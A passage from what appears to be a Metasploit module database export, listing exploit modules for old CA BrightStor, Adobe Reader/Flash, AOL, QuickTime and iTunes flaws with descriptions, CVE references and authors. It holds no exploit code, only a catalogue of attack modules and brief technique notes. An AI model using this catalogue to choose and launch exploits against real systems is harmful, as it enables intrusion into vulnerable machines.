buffer overflow in Computer Associates Threat Manager for the Enterprise r8.1 By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code. In order to successfully exploit this vulnerability, you will need valid logon credentials to the target.","Metasploit Framework License (BSD)","t","2008-04-04 00:00:00",0,,"aggressive","t","BID-28605, CVE-2007-4620, OSVDB-44040","MC " 336,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/hsmserver.rb","exploit","windows/brightstor/hsmserver","exploit/windows/brightstor/hsmserver","CA BrightStor HSM Buffer Overflow",500,"This module exploits one of the multiple stack buffer overflows in Computer Associates BrightStor HSM. By sending a specially crafted request, an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-09-27 00:00:00",0,,"aggressive","t","BID-25823, CVE-2007-5082, OSVDB-41363","toto" 337,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/lgserver.rb","exploit","windows/brightstor/lgserver","exploit/windows/brightstor/lgserver","CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow",200,"This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-01-31 00:00:00",0,,"aggressive","t","BID-22342, CVE-2007-0449, OSVDB-31593","MC " 338,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/lgserver_multi.rb","exploit","windows/brightstor/lgserver_multi","exploit/windows/brightstor/lgserver_multi","CA BrightStor ARCserve for Laptops & Desktops LGServer Multiple Commands Buffer Overflow",200,"This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request to multiple commands, an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-06-06 00:00:00",0,,"aggressive","t","BID-24348, CVE-2007-3216, OSVDB-35329","MC " 339,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb","exploit","windows/brightstor/lgserver_rxrlogin","exploit/windows/brightstor/lgserver_rxrlogin","CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow",200,"This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-06-06 00:00:00",0,,"aggressive","t","BID-24348, CVE-2007-5003, OSVDB-41353","MC " 340,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb","exploit","windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter","exploit/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter","CA BrightStor ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow",200,"This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request (rxsSetDataGrowthScheduleAndFilter), an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-06-06 00:00:00",0,,"aggressive","t","BID-24348, CVE-2007-3216, OSVDB-35329","MC " 341,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb","exploit","windows/brightstor/lgserver_rxsuselicenseini","exploit/windows/brightstor/lgserver_rxsuselicenseini","CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow",200,"This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request (rxsUseLicenseIni), an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-06-06 00:00:00",0,,"aggressive","t","BID-24348, CVE-2007-3216, OSVDB-35329","MC " 342,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/license_gcr.rb","exploit","windows/brightstor/license_gcr","exploit/windows/brightstor/license_gcr","CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow",200,"This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup 11.0. By sending a specially crafted request to the lic98rmtd.exe service, an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2005-03-02 00:00:00",0,,"aggressive","t","BID-12705, CVE-2005-0581, OSVDB-14389","MC " 343,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb","exploit","windows/brightstor/mediasrv_sunrpc","exploit/windows/brightstor/mediasrv_sunrpc","CA BrightStor ArcServe Media Service Stack Buffer Overflow",200,"This exploit targets a stack buffer overflow in the MediaSrv RPC service of CA BrightStor Arcserve. By sending a specially crafted SUNRPC request, an attacker can overflow a stack buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-04-25 00:00:00",0,,"aggressive","t","BID-23635, CVE-2007-2139, OSVDB-35326, URL-https://www.zerodayinitiative.com/advisories/ZDI-07-022.html","toto" 344,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/message_engine.rb","exploit","windows/brightstor/message_engine","exploit/windows/brightstor/message_engine","CA BrightStor ARCserve Message Engine Buffer Overflow",200,"This module exploits a buffer overflow in Computer Associates BrightStor ARCserve Backup 11.1 - 11.5 SP2. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-01-11 00:00:00",1,,"aggressive","t","BID-22005, CVE-2007-0169, OSVDB-31318","MC , patrick " 345,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/message_engine_72.rb","exploit","windows/brightstor/message_engine_72","exploit/windows/brightstor/message_engine_72","CA BrightStor ARCserve Message Engine 0x72 Buffer Overflow",200,"This module exploits a buffer overflow in Computer Associates BrightStor ARCserve Backup 11.1 - 11.5 SP2. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2010-10-04 00:00:00",0,,"aggressive","t","OSVDB-68329, URL-http://www.metasploit.com/users/mc","MC " 346,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/message_engine_heap.rb","exploit","windows/brightstor/message_engine_heap","exploit/windows/brightstor/message_engine_heap","CA BrightStor ARCserve Message Engine Heap Overflow",200,"This module exploits a heap overflow in Computer Associates BrightStor ARCserve Backup 11.5. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2006-10-05 00:00:00",0,,"aggressive","t","BID-20365, CVE-2006-5143, OSVDB-29533","MC " 347,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/sql_agent.rb","exploit","windows/brightstor/sql_agent","exploit/windows/brightstor/sql_agent","CA BrightStor Agent for Microsoft SQL Overflow",200,"This module exploits a vulnerability in the CA BrightStor Agent for Microsoft SQL Server. This vulnerability was discovered by cybertronic[at]gmx.net.","Metasploit Framework License (BSD)","t","2005-08-02 00:00:00",0,,"aggressive","t","BID-14453, CVE-2005-1272, OSVDB-18501, URL-http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities, URL-http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239","hdm " 348,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/tape_engine.rb","exploit","windows/brightstor/tape_engine","exploit/windows/brightstor/tape_engine","CA BrightStor ARCserve Tape Engine Buffer Overflow",200,"This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2006-11-21 00:00:00",1,,"aggressive","t","BID-21221, CVE-2006-6076, EDB-3086, OSVDB-30637, URL-http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=101317","MC , patrick " 349,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/tape_engine_8A.rb","exploit","windows/brightstor/tape_engine_8A","exploit/windows/brightstor/tape_engine_8A","CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow",200,"This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow the buffer and execute arbitrary code.","Metasploit Framework License (BSD)","t","2010-10-04 00:00:00",0,,"aggressive","t","OSVDB-68330, URL-http://www.metasploit.com/users/mc","MC " 350,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/brightstor/universal_agent.rb","exploit","windows/brightstor/universal_agent","exploit/windows/brightstor/universal_agent","CA BrightStor Universal Agent Overflow",200,"This module exploits a convoluted heap overflow in the CA BrightStor Universal Agent service. Triple userland exception results in heap growth and execution of dereferenced function pointer at a specified address.","Metasploit Framework License (BSD)","t","2005-04-11 00:00:00",0,,"aggressive","t","BID-13102, CVE-2005-1018, OSVDB-15471, URL-http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities","hdm " 351,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_cooltype_sing.rb","exploit","windows/browser/adobe_cooltype_sing","exploit/windows/browser/adobe_cooltype_sing","Adobe CoolType SING Table ""uniqueName"" Stack Buffer Overflow",500,"This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are assumed to be vulnerable as well.","Metasploit Framework License (BSD)","f","2010-09-07 00:00:00",0,,"passive","t","CVE-2010-2883, OSVDB-67849, URL-http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html, URL-http://www.adobe.com/support/security/advisories/apsa10-02.html","Unknown, jduck , sn0wfl0w" 352,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb","exploit","windows/browser/adobe_flash_mp4_cprt","exploit/windows/browser/adobe_flash_mp4_cprt","Adobe Flash Player MP4 'cprt' Overflow",300,"This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt .mp4 file loaded by Flash, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the ""Iran's Oil and Nuclear Situation.doc"" e-mail attack. According to the advisory, 10.3.183.15 and 11.x before 11.1.102.62 are affected.","Metasploit Framework License (BSD)","f","2012-02-15 00:00:00",0,,"passive","t","BID-52034, CVE-2012-0754, OSVDB-79300, URL-http://contagiodump.blogspot.com/2012/03/mar-2-cve-2012-0754-irans-oil-and.html, URL-http://www.adobe.com/support/security/bulletins/apsb12-03.html","Alexander Gavrun, juan vazquez , sinn3r " 353,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_flash_otf_font.rb","exploit","windows/browser/adobe_flash_otf_font","exploit/windows/browser/adobe_flash_otf_font","Adobe Flash Player 11.3 Kern Table Parsing Integer Overflow",300,"This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.3.300.271. By supplying a specially crafted .otf font file with a large nTables value in the 'kern' header, it is possible to trigger an integer overflow, which results in remote code execution under the context of the user. This vulnerability has also been exploited in the wild in limited targeted attacks. Please note in order to ensure reliability, the exploit is forced to modify your URIPATH parameter to less than 3 characters, which may cause possible URIPATH collisions.","Metasploit Framework License (BSD)","f","2012-08-09 00:00:00",0,,"passive","t","BID-55009, CVE-2012-1535, OSVDB-84607, URL-http://contagiodump.blogspot.com.es/2012/08/cve-2012-1535-samples-and-info.html, URL-http://labs.alienvault.com/labs/index.php/2012/cve-2012-1535-adobe-flash-being-exploited-in-the-wild/, URL-http://vrt-blog.snort.org/2012/08/cve-2012-1535-flash-0-day-in-wild.html, URL-http://www.adobe.com/support/security/bulletins/apsb12-18.html, URL-https://community.rapid7.com/community/metasploit/blog/2012/08/17/adobe-flash-player-exploit-cve-2012-1535-now-available-for-metasploit, URL-https://developer.apple.com/fonts/TTRefMan/RM06/Chap6.html","Alexander Gavrun, juan vazquez , sinn3r " 354,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_flash_rtmp.rb","exploit","windows/browser/adobe_flash_rtmp","exploit/windows/browser/adobe_flash_rtmp","Adobe Flash Player Object Type Confusion",300,"This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt AMF0 ""_error"" response, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the ""World Uyghur Congress Invitation.doc"" e-mail attack. According to the advisory, 10.3.183.19 and 11.x before 11.2.202.235 are affected.","Metasploit Framework License (BSD)","f","2012-05-04 00:00:00",0,,"passive","t","BID-53395, CVE-2012-0779, OSVDB-81656, URL-http://contagiodump.blogspot.com.es/2012/05/may-3-cve-2012-0779-world-uyghur.html, URL-http://www.adobe.com/support/security/bulletins/apsb12-09.html, URL-https://community.rapid7.com/community/metasploit/blog/2012/06/22/the-secret-sauce-to-cve-2012-0779-adobe-flash-object-confusion-vulnerability","juan vazquez , sinn3r " 355,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_flash_sps.rb","exploit","windows/browser/adobe_flash_sps","exploit/windows/browser/adobe_flash_sps","Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow",300,"This module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx component. When processing a MP4 file (specifically the Sequence Parameter Set), Flash will see if pic_order_cnt_type is equal to 1, which sets the num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in offset_for_ref_frame on the stack, which allows arbitrary remote code execution under the context of the user. Numerous reports also indicate that this vulnerability has been exploited in the wild.","Metasploit Framework License (BSD)","f","2011-08-09 00:00:00",0,,"passive","t","BID-49083, CVE-2011-2140, OSVDB-74439, URL-http://0x1byte.blogspot.com/2011/11/analysis-of-cve-2011-2140-adobe-flash.html, URL-http://www.abysssec.com/blog/2012/01/31/exploiting-cve-2011-2140-another-flash-player-vulnerability/, URL-http://www.adobe.com/support/security/bulletins/apsb11-21.html, URL-http://www.kahusecurity.com/2011/cve-2011-2140-caught-in-the-wild/, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-276/","Abysssec, Alexander Gavrun, sinn3r " 356,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb","exploit","windows/browser/adobe_flashplayer_arrayindexing","exploit/windows/browser/adobe_flashplayer_arrayindexing","Adobe Flash Player AVM Verification Logic Array Indexing Code Execution",500,"This module exploits a vulnerability in Adobe Flash Player versions 10.3.181.23 and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same vulnerability that was used for attacks against Korean based organizations. Specifically, this issue occurs when indexing an array using an arbitrary value, memory can be referenced and later executed. Taking advantage of this issue does not rely on heap spraying as the vulnerability can also be used for information leakage. Currently this exploit works for IE6, IE7, IE8, Firefox 10.2 and likely several other browsers under multiple Windows platforms. This exploit bypasses ASLR/DEP and is very reliable.","Metasploit Framework License (BSD)","f","2012-06-21 00:00:00",0,,"passive","t","BID-48268, CVE-2011-2110, OSVDB-73007, URL-http://www.accessroot.com/arteam/site/download.php?view.331, URL-http://www.adobe.com/devnet/swf.html, URL-http://www.adobe.com/support/security/bulletins/apsb11-18.html, URL-http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20110617","Unknown, mr_me " 357,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_flashplayer_avm.rb","exploit","windows/browser/adobe_flashplayer_avm","exploit/windows/browser/adobe_flashplayer_avm","Adobe Flash Player AVM Bytecode Verification Vulnerability",400,"This module exploits a vulnerability in Adobe Flash Player versions 10.2.152.33 and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same vulnerability that was used for the RSA attack in March 2011. Specifically, this issue results in uninitialized memory being referenced and later executed. Taking advantage of this issue relies on heap spraying and controlling the uninitialized memory. Currently this exploit works for IE6, IE7, and Firefox 3.6 and likely several other browsers. DEP does catch the exploit and causes it to fail. Due to the nature of the uninitialized memory its fairly difficult to get around this restriction.","Metasploit Framework License (BSD)","f","2011-03-15 00:00:00",0,,"passive","t","CVE-2011-0609, OSVDB-71254, URL-http://bugix-security.blogspot.com/2011/03/cve-2011-0609-adobe-flash-player.html, URL-http://www.adobe.com/devnet/swf.html, URL-http://www.adobe.com/support/security/advisories/apsa11-01.html, URL-http://www.f-secure.com/weblog/archives/00002226.html","Unknown, bannedit " 358,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb","exploit","windows/browser/adobe_flashplayer_flash10o","exploit/windows/browser/adobe_flashplayer_flash10o","Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",300,"This module exploits a vulnerability in Adobe Flash Player that was discovered, and has been exploited actively in the wild. By embedding a specially crafted .swf file, Adobe Flash crashes due to an invalid use of an object type, which allows attackers to overwrite a pointer in memory, and results arbitrary code execution. Please note for IE 8 targets, Java Runtime Environment must be available on the victim machine in order to work properly.","Metasploit Framework License (BSD)","f","2011-04-11 00:00:00",0,,"passive","t","BID-47314, CVE-2011-0611, OSVDB-71686, URL-http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx, URL-http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day.html, URL-http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html, URL-http://secunia.com/blog/210, URL-http://www.adobe.com/support/security/bulletins/apsb11-07.html","sinn3r " 359,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb","exploit","windows/browser/adobe_flashplayer_newfunction","exploit/windows/browser/adobe_flashplayer_newfunction","Adobe Flash Player ""newfunction"" Invalid Pointer Use",300,"This module exploits a vulnerability in the DoABC tag handling within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code execution is achieved by embedding a specially crafted Flash movie into a PDF document. An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled. NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various Windows versions due a the hardcoded syscall number.","Metasploit Framework License (BSD)","f","2010-06-04 00:00:00",0,,"passive","t","BID-40586, CVE-2010-1297, OSVDB-65141, URL-http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/, URL-http://www.adobe.com/support/security/advisories/apsa10-01.html","Unknown, jduck " 360,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb","exploit","windows/browser/adobe_flatedecode_predictor02","exploit/windows/browser/adobe_flatedecode_predictor02","Adobe FlateDecode Stream Predictor 02 Integer Overflow",400,"This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2.","Metasploit Framework License (BSD)","f","2009-10-08 00:00:00",0,,"passive","t","BID-36600, CVE-2009-3459, OSVDB-58729, URL-http://blogs.adobe.com/psirt/2009/10/adobe_reader_and_acrobat_issue_1.html, URL-http://www.adobe.com/support/security/bulletins/apsb09-15.html, URL-http://www.fortiguard.com/analysis/pdfanalysis.html","jabra, jduck , unknown" 361,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_geticon.rb","exploit","windows/browser/adobe_geticon","exploit/windows/browser/adobe_geticon","Adobe Collab.getIcon() Buffer Overflow",400,"This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted pdf that a contains malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-03-24 00:00:00",0,,"passive","t","CVE-2009-0927, OSVDB-53647, URL-http://www.adobe.com/support/security/bulletins/apsb09-04.html, URL-http://www.zerodayinitiative.com/advisories/ZDI-09-014/","Didier Stevens , MC , jduck " 362,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_jbig2decode.rb","exploit","windows/browser/adobe_jbig2decode","exploit/windows/browser/adobe_jbig2decode","Adobe JBIG2Decode Heap Corruption",400,"This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon javascript for the heap spray.","Metasploit Framework License (BSD)","f","2009-02-19 00:00:00",0,,"passive","t","CVE-2009-0658, OSVDB-52073, URL-http://bl4cksecurity.blogspot.com/2009/03/adobe-acrobatreader-universal-exploit.html, URL-http://www.adobe.com/support/security/bulletins/apsb09-04.html","Didier Stevens , MC , natron , redsand, xort" 363,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_media_newplayer.rb","exploit","windows/browser/adobe_media_newplayer","exploit/windows/browser/adobe_media_newplayer","Adobe Doc.media.newPlayer Use After Free Vulnerability",400,"This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat Professional versions up to and including 9.2.","Metasploit Framework License (BSD)","f","2009-12-14 00:00:00",0,,"passive","t","BID-37331, CVE-2009-4324, OSVDB-60980, URL-http://www.adobe.com/support/security/bulletins/apsb10-02.html","hdm , jabra, jduck , pusscat , unknown" 364,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb","exploit","windows/browser/adobe_shockwave_rcsl_corruption","exploit/windows/browser/adobe_shockwave_rcsl_corruption","Adobe Shockwave rcsL Memory Corruption",300,"This module exploits a weakness in the Adobe Shockwave player's handling of Director movies (.DIR). A memory corruption vulnerability occurs through an undocumented rcsL chunk. This vulnerability was discovered by http://www.abysssec.com.","Metasploit Framework License (BSD)","f","2010-10-21 00:00:00",0,,"passive","t","CVE-2010-3653, OSVDB-68803, URL-http://www.adobe.com/support/security/bulletins/apsb10-25.html, URL-http://www.exploit-db.com/sploits/Adobe_Shockwave_Director_rcsL_Chunk_Memory_Corruption.zip","David Kennedy ""ReL1K"" " 365,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/adobe_utilprintf.rb","exploit","windows/browser/adobe_utilprintf","exploit/windows/browser/adobe_utilprintf","Adobe util.printf() Buffer Overflow",400,"This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf() entry, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-02-08 00:00:00",0,,"passive","t","CVE-2008-2992, OSVDB-49520","Didier Stevens , MC " 366,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/aim_goaway.rb","exploit","windows/browser/aim_goaway","exploit/windows/browser/aim_goaway","AOL Instant Messenger goaway Overflow",500,"This module exploits a flaw in the handling of AOL Instant Messenger's 'goaway' URI handler. An attacker can execute arbitrary code by supplying a overly sized buffer as the 'message' parameter. This issue is known to affect AOL Instant Messenger 5.5.","Metasploit Framework License (BSD)","f","2004-08-09 00:00:00",0,,"passive","t","BID-10889, CVE-2004-0636, OSVDB-8398, URL-http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities","skape , thief " 367,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb","exploit","windows/browser/aladdin_choosefilepath_bof","exploit/windows/browser/aladdin_choosefilepath_bof","Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow",300,"This module exploits a vulnerability found in Aladdin Knowledge System's ActiveX component. By supplying a long string of data to the ChooseFilePath() function, a buffer overflow occurs, which may result in remote code execution under the context of the user.","Metasploit Framework License (BSD)","f","2012-04-01 00:00:00",0,,"passive","t","EDB-22258, EDB-22301, OSVDB-86723","b33f, juan vazquez , shinnai, sinn3r " 368,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/amaya_bdo.rb","exploit","windows/browser/amaya_bdo","exploit/windows/browser/amaya_bdo","Amaya Browser v11.0 'bdo' Tag Overflow",300,"This module exploits a stack buffer overflow in the Amaya v11 Browser. By sending an overly long string to the ""bdo"" tag, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-01-28 00:00:00",0,,"passive","t","BID-33046, BID-33047, CVE-2009-0323, OSVDB-55721","dookie, original exploit by Rob Carter" 369,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/aol_ampx_convertfile.rb","exploit","windows/browser/aol_ampx_convertfile","exploit/windows/browser/aol_ampx_convertfile","AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow",300,"This module exploits a stack-based buffer overflow in AOL IWinAmpActiveX class (AmpX.dll) version 2.4.0.6 installed via AOL Radio website. By setting an overly long value to 'ConvertFile()', an attacker can overrun a buffer and execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-05-19 00:00:00",0,,"passive","t","BID-35028, EDB-8733, OSVDB-54706","Trancer , rgod " 370,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/aol_icq_downloadagent.rb","exploit","windows/browser/aol_icq_downloadagent","exploit/windows/browser/aol_icq_downloadagent","America Online ICQ ActiveX Control Arbitrary File Download and Execute",600,"This module allows remote attackers to download and execute arbitrary files on a users system via the DownloadAgent function of the ICQPhone.SipxPhoneManager ActiveX control.","Metasploit Framework License (BSD)","f","2006-11-06 00:00:00",0,,"passive","t","BID-20930, CVE-2006-5650, OSVDB-30220, URL-http://www.zerodayinitiative.com/advisories/ZDI-06-037/","MC " 371,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/apple_itunes_playlist.rb","exploit","windows/browser/apple_itunes_playlist","exploit/windows/browser/apple_itunes_playlist","Apple ITunes 4.7 Playlist Buffer Overflow",300,"This module exploits a stack buffer overflow in Apple ITunes 4.7 build 4.7.0.42. By creating a URL link to a malicious PLS file, a remote attacker could overflow a buffer and execute arbitrary code. When using this module, be sure to set the URIPATH with an extension of '.pls'.","Metasploit Framework License (BSD)","f","2005-01-11 00:00:00",0,,"passive","t","BID-12238, CVE-2005-0043, OSVDB-12833","MC " 372,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb","exploit","windows/browser/apple_quicktime_marshaled_punk","exploit/windows/browser/apple_quicktime_marshaled_punk","Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution",500,"This module exploits a memory trust issue in Apple QuickTime 7.6.7. When processing a specially-crafted HTML page, the QuickTime ActiveX control will treat a supplied parameter as a trusted pointer. It will then use it as a COM-type pUnknown and lead to arbitrary code execution. This exploit utilizes a combination of heap spraying and the QuickTimeAuthoring.qtx module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions. NOTE: The addresses may need to be adjusted for older versions of QuickTime.","Metasploit Framework License (BSD)","f","2010-08-30 00:00:00",0,,"passive","t","CVE-2010-1818, OSVDB-67705, URL-http://reversemode.com/index.php?option=com_content&task=view&id=69&Itemid=1","Ruben Santemarta, jduck " 373,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/apple_quicktime_mime_type.rb","exploit","windows/browser/apple_quicktime_mime_type","exploit/windows/browser/apple_quicktime_mime_type","Apple QuickTime 7.7.2 MIME Type Buffer Overflow",300,"This module exploits a buffer overflow in Apple QuickTime 7.7.2. The stack based overflow occurs when processing a malformed Content-Type header. The module has been tested successfully on Safari 5.1.7 and 5.0.7 on Windows XP SP3.","Metasploit Framework License (BSD)","f","2012-11-07 00:00:00",0,,"passive","t","BID-56438, CVE-2012-3753, OSVDB-87088, URL-http://asintsov.blogspot.com.es/2012/11/heapspray.html, URL-http://support.apple.com/kb/HT5581","Pavel Polischouk, juan vazquez " 374,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/apple_quicktime_rtsp.rb","exploit","windows/browser/apple_quicktime_rtsp","exploit/windows/browser/apple_quicktime_rtsp","Apple QuickTime 7.1.3 RTSP URI Buffer Overflow",300,"This module exploits a buffer overflow in Apple QuickTime 7.1.3. This module was inspired by MOAB-01-01-2007. The Browser target for this module was tested against IE 6 and Firefox 1.5.0.3 on Windows XP SP0/2; Firefox 3 blacklists the QuickTime plugin.","Metasploit Framework License (BSD)","f","2007-01-01 00:00:00",0,,"passive","t","BID-21829, CVE-2007-0015, OSVDB-31023, URL-http://projects.info-pull.com/moab/MOAB-01-01-2007.html","MC , egypt " 375,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb","exploit","windows/browser/apple_quicktime_smil_debug","exploit/windows/browser/apple_quicktime_smil_debug","Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow",400,"This module exploits a buffer overflow in Apple QuickTime 7.6.6. When processing a malformed SMIL uri, a stack-based buffer overflow can occur when logging an error message.","Metasploit Framework License (BSD)","f","2010-08-12 00:00:00",0,,"passive","t","BID-41962, CVE-2010-1799, 